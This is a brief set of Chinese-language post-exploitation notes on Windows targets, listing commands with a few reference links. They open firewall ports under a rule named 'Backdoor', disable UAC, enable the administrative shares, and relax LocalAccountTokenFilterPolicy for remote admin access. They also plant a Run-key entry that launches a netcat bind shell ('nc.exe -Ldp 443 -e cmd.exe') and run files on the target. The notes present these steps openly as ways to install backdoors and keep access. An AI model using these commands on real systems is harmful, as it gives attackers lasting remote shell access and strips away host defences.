1,防火墙
https://docs.microsoft.com/zh-cn/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior
https://blog.csdn.net/no1xium/article/details/107358939
netsh advfirewall firewall add rule name= "Open Port 80" dir=in action=allow protocol=TCP localport=80 (新版)
netsh firewall add portopening TCP 443 "Backdoor" ENABLE ALL (旧版)
netsh advfirewall firewall show rule name = all profile = private
2,UAC
关闭
C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
启用
C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
3,默认共享
net share c$=c:
net share d$=d:
net share ipc$
net share admin$
或命令行修改注册表
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
4,upload 上载程序吗、木马、后门儿
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'
5,修改注册表,自启
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "java" /t REG_SZ /d "C:\Program File\Java\jre1.6.0_02\java.exe" /f
reg add 的格式如下:REG ADD KeyName [/v ValueName | /ve] [/t Type] [/s Separator] [/d Data] [/f]
6,目标机执行文件
开机自启或
execute -f 目标机上的可执行文件名。
参考:https://blog.csdn.net/weixin_54472394/article/details/124619632